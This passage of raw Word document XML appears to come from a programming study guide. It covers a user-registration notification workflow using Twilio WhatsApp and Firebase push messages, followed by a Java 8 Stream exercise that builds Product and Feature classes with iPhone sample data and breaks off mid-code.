          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D67C9B6" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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fter registration, the backend sends a push notification to the user's mobile device using Firebase Cloud Messaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B21E97" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00521BB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2C31C6E">
          <v:rect id="_x0000_i1899" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C47AB" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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 of the Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E664989" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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User provides registration details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051FBB27" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ackend validates and stores user details</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B8B5B" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ackend sends a WhatsApp message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Twilio API to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFDE0C6" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ackend sends a mobile push notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Firebase Cloud Messaging (FCM) to the user’s mobile device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A4E70B" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00521BB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26731E">
          <v:rect id="_x0000_i1900" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6240660A" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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ime Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B976DB1" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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hatsApp Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Twilio API typically has a response time of about a few milliseconds to seconds, depending on network speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B57F3E5" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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CM Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Firebase's push notification also has a similar time complexity, typically O(1) for sending the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583474CD" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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pace Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F71C9CA" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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oth notification systems (WhatsApp and mobile push) have negligible space complexity in this context, as they do not require significant memory usage except for the message data itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8B6C1" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F026240" w14:textId="4AC01ED8" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="381" w:name="_Toc196307861"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="006B12C9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Java 8 Stream Program</w:t>
      </w:r>
      <w:bookmarkEnd w:id="381"/>
      <w:r w:rsidR="006B12C9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7EF5C" w14:textId="77777777" w:rsidR="00EB4F1F" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="00EB4F1F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00EB4F1F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a Java code, we have Product and Feature class with Product having model, color, price, location and List&lt;Feature&gt; and Feature class having picture and resolution fields, Write a code using Java 8 Stream API?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD684F2" w14:textId="1A3F9F68" w:rsidR="00EB4F1F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4F1F" w:rsidP="00EB4F1F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>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t>1. Print Product which is iPhone 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB720AB" w14:textId="15D3213D" w:rsidR="00EB4F1F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4F1F" w:rsidP="00EB4F1F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>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t>2. get the product and its feature which has highest resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980222B" w14:textId="5FAEED70" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4F1F" w:rsidP="00EB4F1F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>3. Print number of iPhone15 and iPhone16 count in each location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB9B45" w14:textId="2BBEB35C" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B9218A"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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p>
    <w:p w14:paraId="4E4898C1"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p>
    <w:p w14:paraId="5218F410"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257DC63"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eatur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FAE7BE3"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picture</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D3769B"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resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6279C231"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741BC03E"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eature</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pictur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resolu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7AB00AF"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pictur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icture</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264624A6"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resolutio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esolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF8BD6F"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0882FF4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A47B62"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getResolu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81E2CFB"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resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B04C82"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E740152"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363AEC9"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62352292"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to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B7C14CE"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Feature{pictur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ictur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resoluti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esolutio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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5236ED8A"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043A4A5"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E101BCA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B070A06"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roduc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8184266"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model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B82210"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color</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FFA5F0"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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> price</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DD821"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location</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A95211"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Feature</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features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBE151E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3CE98E"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roduc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mode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col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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pri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loca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Feature</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feature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DD8B544"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model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odel</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAED2E2"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colo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olor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD187F"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pric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rice</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01854C"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locatio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location</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44638130"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feature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eatures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385FDA57"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0481585"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E67F4"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getMode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E96F746"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model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4099072E"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9B545E1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A469E3B"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getLoca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23120F1"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location</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C9796C"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943DCBB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77CA21"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Feature</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getFeature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D921673"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features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58741809"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8CAFE70"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E90017B"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159589A7"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to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4CE8776"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Product{mode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odel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col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olo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pric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ric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locati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locatio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feature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eature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t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222F91C3"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5F79BCB"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572065D4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF60DE"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i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A63D8E0"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383D400"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236900E8"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ample data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E549655"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eature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature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eatur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icture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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17EA62"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Feature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature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eatur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icture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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56879195"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eature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature3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eatur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icture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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8F51F"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eature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature4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eatur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icture4"</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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691060A1"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p>
    <w:p w14:paraId="3457ED6F"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Feature</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iphone15Feature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eature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eature2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3C9936"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Feature</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iphone16Feature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eature3</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eature4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE76F3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB602F3"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roduct</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> iphone15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roduc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iPhone 1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Blac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999.99</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New Yor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phone15Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BE05F"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roduct</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> iphone16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roduc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iPhone 16"</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Whit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099.99</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Californi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phone16Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB69EA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B01D6"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Product</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product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phone1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phone16</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242241B1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513ED9B3"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1. Print Product which is iPhone 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73327CEB"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1. Product iPhone 16:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
